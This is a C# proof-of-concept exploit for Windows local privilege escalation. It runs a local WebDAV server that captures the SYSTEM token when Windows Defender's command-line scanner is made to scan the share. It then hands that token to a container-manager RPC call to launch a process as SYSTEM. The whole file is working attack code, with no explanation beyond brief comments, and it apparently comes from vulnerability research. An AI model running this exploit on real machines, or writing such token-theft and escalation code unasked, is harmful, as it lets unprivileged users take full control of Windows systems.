﻿using NtApiDotNet;
using NtApiDotNet.Ndr.Marshal;
using NtApiDotNet.Win32;
using NWebDav.Server;
using NWebDav.Server.Http;
using NWebDav.Server.HttpListener;
using NWebDav.Server.Locking;
using NWebDav.Server.Logging;
using NWebDav.Server.Props;
using NWebDav.Server.Stores;
using System;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Net;
using System.Security.Principal;
using System.Threading;
using System.Threading.Tasks;

namespace POC
{
    class Program
    {
        private static NtToken _token;
        private static AutoResetEvent _listener_started_event = new AutoResetEvent(false);
        private static AutoResetEvent _token_captured_event = new AutoResetEvent(false);

        private static async void DispatchHttpRequestsAsync(string root, CancellationToken cancellationToken)
        {
            HttpListener listener = new HttpListener();
            listener.Prefixes.Add("http://127.0.0.1:8080/");
            listener.AuthenticationSchemes = AuthenticationSchemes.IntegratedWindowsAuthentication;
            listener.Start();

            // Create a request handler factory that uses basic authentication
            var requestHandlerFactory = new RequestHandlerFactory();
            var webDavDispatcher = new WebDavDispatcher(new DiskStore(Path.GetFullPath(root)), requestHandlerFactory);

            _listener_started_event.Set();

            HttpListenerContext httpListenerContext;
            while (!cancellationToken.IsCancellationRequested && (httpListenerContext = await listener.GetContextAsync().ConfigureAwait(false)) != null)
            {
                if (_token == null && httpListenerContext.User.Identity is WindowsIdentity identity)
                {
                    if (identity.IsSystem)
                    {
                        NtToken token = NtToken.FromHandle(identity.AccessToken.DangerousGetHandle());
                        _token = token.DuplicateToken(TokenType.Primary, SecurityImpersonationLevel.Anonymous, TokenAccessRights.GenericAll);
                        Console.WriteLine("Captured: {0} - {1} - {2}", _token.User.Name, _token.ImpersonationLevel, _token.GrantedAccess);
                        _token_captured_event.Set();
                    }
                }
                await webDavDispatcher.DispatchRequestAsync(new HttpContext(httpListenerContext)).ConfigureAwait(false);
            }
        }

        static void RunExploit()
        {
            int retry_count = 120;
            // Wait for the process to come up.
            while (retry_count-- > 0)
            {
                Thread.Sleep(1000);
                using (var procs = NtProcess.GetProcesses(ProcessAccessRights.GenericAll).ToDisposableList())
                {
                    foreach (var p in procs)
                    {
                        Console.WriteLine("{0} - {1}", p.ProcessId, p.Name);
                        if (p.Name.ToLower() == "cmproxyd.exe" && p.User == KnownSids.LocalSystem)
                        {
                            Console.WriteLine("Found SYSTEM process pid:{0}", p.ProcessId);
                            Console.WriteLine("Hit ENTER to exit.");
                            Console.ReadLine();
                            return;
                        }
                    }
                    Console.WriteLine("Didn't find process, retrying.");
                }
            }
        }

        static void StartContainer()
        {
            if (_token == null)
            {
                throw new ArgumentException("Didn't get a SYSTEM token.");
            }

            using (NtToken token = _token.DuplicateToken(SecurityImpersonationLevel.Impersonation))
            {
                Acl dacl = new Acl();
                dacl.AddAccessAllowedAce(GenericAccessRights.GenericAll, KnownSids.World);
                token.SetDefaultDacl(dacl);

                Client c = new Client();
                c.Connect();

                Guid guid = Guid.NewGuid();
                Container_Config config = new Container_Config();
                config.Owner = "Madrid";
                config.Member8 = 4;
                config.Member10 = new NdrUInt3264();

                Struct_3 s3 = new Struct_3();
                s3.Member0 = 1;
                s3.Member8 = new string[] { NtProcess.Current.User.ToString() };
                config.Member18 = s3;

                config.Member28 = 0x1000;
                config.Member38 = new Struct_2();
                config.Member40 = 3;
                config.Member48 = token;

                int result = c.CmsRpcSrv_CreateContainer(guid, 5, config, out Struct_7 s7, out NdrContextHandle container_handle);
                if (result != 0)
                {
                    throw new ArgumentException($"CreateContainer: {result}");
                }

                try
                {
                    result = c.CmsRpcSrv_EnableContainerNotifications(container_handle);
                    if (result != 0)
                    {
                        throw new ArgumentException($"EnableNotify: {result}");
                    }

                    // 5000, timeout?
                    result = c.CmsRpcSrv_CreateActivity(container_handle, 5000, out Struct_7 s7_2, out NdrContextHandle activity_handle);
                    if (result != 0)
                    {
                        throw new ArgumentException($"CreateActivity: {result}");
                    }

                    try
                    {
                        result = c.CmsRpcSrv_StartActivityAsync(activity_handle);
                        if (result != 0)
                        {
                            throw new ArgumentException($"Start: {result}");
                        }

                        Console.WriteLine("Started Activity.");
                        RunExploit();
                    }
                    finally
                    {
                        c.CmsRpcSrv_CloseActivity(ref activity_handle);
                    }
                }
                finally
                {
                    c.CmsRpcSrv_CloseContainer(ref container_handle);
                }
            }
        }

        static void StartWebDav()
        {
            var webclient = ServiceUtils.GetService("WebClient");
            if (webclient.Status == ServiceStatus.Running)
            {
                Console.WriteLine("WebClient service already running.");
                return;
            }
            if (webclient.StartType == ServiceStartType.Disabled)
            {
                throw new ArgumentException("WebClient is disabled, can't continue.");
            }
            var trigger = webclient.Triggers.First();
            trigger.Trigger();
            int retry_count = 100;
            while(retry_count-- > 0)
            {
                webclient = ServiceUtils.GetService("WebClient");
                if (webclient.Status == ServiceStatus.Running)
                    break;
                Thread.Sleep(100);
            }
            Console.WriteLine("Started WebClient service.");
        }

        static void StartDefender()
        {
            StartWebDav();
            // Give it another second to stablize.
            Thread.Sleep(1000);
            // "%ProgramFiles%\Windows Defender\mpcmdrun.exe" -scan -scantype 3 -file \\127.0.0.1@8080\DavWWWRoot -disableremediation
            string defender_path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles), @"Windows Defender\mpcmdrun.exe");
            if (!File.Exists(defender_path))
            {
                throw new ArgumentException($"Can't find defender CLI application at {defender_path}.");
            }

            ProcessStartInfo start_info = new ProcessStartInfo(defender_path, 
                @"-scan -scantype 3 -file \\127.0.0.1@8080\DavWWWRoot -disableremediation");
            start_info.UseShellExecute = false;
            Process process = Process.Start(start_info);
            process.WaitForExit();
        }

        static void Main()
        {
            try
            {
                string root_dir = Path.GetDirectoryName(typeof(Program).Assembly.Location);
                Console.WriteLine("Using root directory {0}", root_dir);
                LoggerFactory.Factory = new ConsoleAdapter();
                var cancellationTokenSource = new CancellationTokenSource();
                DispatchHttpRequestsAsync(root_dir, cancellationTokenSource.Token);
                if (!_listener_started_event.WaitOne(10000))
                {
                    throw new TimeoutException("HTTP listener never started.");
                }

                StartDefender();
                if (!_token_captured_event.WaitOne(10000))
                {
                    throw new TimeoutException("Token never captured.");
                }
                cancellationTokenSource.Cancel();
                StartContainer();
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
